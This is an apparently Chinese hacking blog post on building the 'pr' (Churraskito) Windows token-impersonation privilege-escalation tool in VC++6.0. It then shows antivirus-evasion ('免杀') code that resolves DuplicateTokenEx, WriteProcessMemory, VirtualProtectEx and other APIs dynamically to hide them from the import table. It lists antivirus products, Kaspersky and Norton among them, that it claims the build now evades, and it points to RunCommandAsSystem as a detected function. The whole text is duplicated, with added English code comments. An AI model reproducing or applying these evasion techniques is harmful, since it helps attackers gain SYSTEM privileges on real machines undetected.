网络安全:PR Source code Build & to avoid killing
2013-06-13 14:37
这里源码是暗组上面提供的KOOPie写的pr
这些利用工具源码都是vs 2003,编译的环境和vc不太一样,因此,在编译的时候会出现这样那样的问题
下面我们就以vc++6.0来编译pr。
环境:vc++6.0
缺少的文件:sshwbemhelpers.h(2003 服务器特有的),所以需要我们到网上下载,然后复制(覆盖)到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h。该头文件会被直接编译进工程,下载后应先核对来源和内容。
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
执行 cl.exe 时出错.
工程设置:
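Project Settings --> Link --> “对象/库模块”后面添加以下几个库,否则会出现下面的链接错误(psapi.lib 对应 GetModuleBaseNameA、EnumProcessModules;Ws2_32.lib 对应 connect、bind、WSASocketA 等 Winsock 符号):
psapi.lib wsock32.lib Ws2_32.lib xolehlp.lib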
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
stdafx.cpp
Linking...
Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals
*******************************************免杀**********************************************
nod32:
LookupAccountSid
DuplicateTokenEx
// Function-pointer type whose parameter list matches the ADVAPI32 export
// LookupAccountSidA (ANSI variant), followed by a pointer of that type.
// The pointer is resolved when this statement runs, via LoadLibrary +
// GetProcAddress, rather than through a link-time import, so this call site
// adds no import-table entry for the API. For detection purposes the export
// name is still present as a plain string literal, and the call is unchanged
// at run time.
// NOTE(review): neither the LoadLibrary handle nor the GetProcAddress result
// is checked, and the module handle is not kept.
typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");
// Function-pointer type matching the ADVAPI32 export DuplicateTokenEx (creates
// a new access token from an existing one), followed by a pointer of that type.
// The address is looked up by name with GetProcAddress when this statement
// runs, so the API is not referenced through the import table here; token
// duplication remains observable at run time (e.g. by behavioural monitoring).
// NOTE(review): the LoadLibrary and GetProcAddress results are used unchecked.
typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
(
__in HANDLE hExistingToken,
__in DWORD dwDesiredAccess,
__in_opt LPSECURITY_ATTRIBUTES lpTokenAttributes,
__in SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
__in TOKEN_TYPE TokenType,
__deref_out PHANDLE phNewToken
);
DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");
kaspersky:过
Avira AntiVir :过
mcafee: 过
AVG: 过
symantec企业版:过
Norton AntiVirus:过
360全套:过
金山毒霸全套:
// Function-pointer type matching the KERNEL32 export VirtualProtectEx (changes
// page protection in the process identified by hProcess), plus a pointer of
// that type resolved by name through GetProcAddress.
// Resolving it this way keeps the API out of this module's import table; the
// literal "VirtualProtectEx" string and the cross-process protection change
// itself remain available to static and behavioural detection.
// NOTE(review): no check that LoadLibrary or GetProcAddress succeeded.
typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
(
__in HANDLE hProcess,
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");
// Function-pointer type matching the KERNEL32 export WriteProcessMemory
// (copies nSize bytes from lpBuffer into the address space of hProcess), plus
// a pointer of that type obtained with LoadLibrary + GetProcAddress.
// The lookup by name replaces a link-time import, so the API does not show up
// in the import table from this call site; writes into another process are
// still visible to run-time monitoring.
// NOTE(review): the returned module handle and function address are unchecked.
typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
(
__in HANDLE hProcess,
__in LPVOID lpBaseAddress,
__in_bcount(nSize) LPCVOID lpBuffer,
__in SIZE_T nSize,
__out_opt SIZE_T * lpNumberOfBytesWritten
);
WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");
// Function-pointer type matching the ADVAPI32 export GetTokenInformation
// (queries an attribute class of an access token), plus a pointer of that type
// resolved by export name when this statement runs.
// Because the address comes from GetProcAddress, the API is not pulled in via
// the import table here; the export name remains in the binary as a string.
// NOTE(review): LoadLibrary / GetProcAddress failure is not handled.
typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");
金山主动防御能过,金山杀毒扫描能出来,但是执行不提示,杀下面的两个自定义函数 :
DelRegistrySubkeys 和 RunCommandAsSystem
DelRegistrySubkeys();
printf ("/xxoo/-->Running command with SYSTEM Token...\n");
if (RunCommandAsSystem(hTokenOut, lpCommand))
{
printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
return 0;
}
这些利用工具源码都是vs 2003,编译的环境和vc不太一样,因此,在编译的时候会出现这样那样的问题
下面我们就以vc++6.0来编译pr。
环境:vc++6.0
缺少的文件:sshwbemhelpers.h(2003 服务器特有的),所以需要我们到网上下载,然后复制(覆盖)到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h。该头文件会被直接编译进工程,下载后应先核对来源和内容。
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
执行 cl.exe 时出错.
工程设置:
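Project Settings --> Link --> “对象/库模块”后面添加以下几个库,否则会出现下面的链接错误(psapi.lib 对应 GetModuleBaseNameA、EnumProcessModules;Ws2_32.lib 对应 connect、bind、WSASocketA 等 Winsock 符号):
psapi.lib wsock32.lib Ws2_32.lib xolehlp.lib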
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
stdafx.cpp
Linking...
Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals
*******************************************免杀**********************************************
nod32:
LookupAccountSid
DuplicateTokenEx
// Pointer-to-function type with the same parameters as the ADVAPI32 export
// LookupAccountSidA, and a variable of that type.
// The variable is initialised by a by-name lookup (LoadLibrary followed by
// GetProcAddress) instead of a link-time import, which keeps this API out of
// the import table for this call site. The export name still appears in the
// binary as a string literal.
// NOTE(review): both lookup results are used without a NULL check.
typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");
// Pointer-to-function type with the same parameters as the ADVAPI32 export
// DuplicateTokenEx, and a variable of that type.
// The variable is set from GetProcAddress on a freshly loaded ADVAPI32.dll
// handle, so the token-duplication API is reached without an import-table
// reference from this code; the call is still observable at run time.
// NOTE(review): both lookup results are used without a NULL check.
typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
(
__in HANDLE hExistingToken,
__in DWORD dwDesiredAccess,
__in_opt LPSECURITY_ATTRIBUTES lpTokenAttributes,
__in SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
__in TOKEN_TYPE TokenType,
__deref_out PHANDLE phNewToken
);
DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");
kaspersky:过
Avira AntiVir :过
mcafee: 过
AVG: 过
symantec企业版:过
Norton AntiVirus:过
360全套:过
金山毒霸全套:
// Pointer-to-function type with the same parameters as the KERNEL32 export
// VirtualProtectEx, and a variable of that type.
// The address is fetched by name from KERNEL32.dll with GetProcAddress, so
// the API is not listed in the import table because of this code. The name
// string and the resulting cross-process page-protection change remain
// visible to static and behavioural detection.
// NOTE(review): both lookup results are used without a NULL check.
typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
(
__in HANDLE hProcess,
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");
// Pointer-to-function type with the same parameters as the KERNEL32 export
// WriteProcessMemory, and a variable of that type.
// The address is fetched by name from KERNEL32.dll with GetProcAddress rather
// than imported at link time, so the import table does not reference the API
// from here; the write into the target process is unchanged at run time.
// NOTE(review): both lookup results are used without a NULL check.
typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
(
__in HANDLE hProcess,
__in LPVOID lpBaseAddress,
__in_bcount(nSize) LPCVOID lpBuffer,
__in SIZE_T nSize,
__out_opt SIZE_T * lpNumberOfBytesWritten
);
WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");
// Pointer-to-function type with the same parameters as the ADVAPI32 export
// GetTokenInformation, and a variable of that type.
// The variable is filled by a by-name GetProcAddress lookup on ADVAPI32.dll,
// so no import-table entry for the API results from this code; the export
// name is still stored in the binary as a string literal.
// NOTE(review): both lookup results are used without a NULL check.
typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");
金山主动防御能过,金山杀毒扫描能出来,但是执行不提示,杀下面的两个自定义函数 :
DelRegistrySubkeys 和 RunCommandAsSystem
DelRegistrySubkeys();
printf ("/xxoo/-->Running command with SYSTEM Token...\n");
if (RunCommandAsSystem(hTokenOut, lpCommand))
{
printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
return 0;
}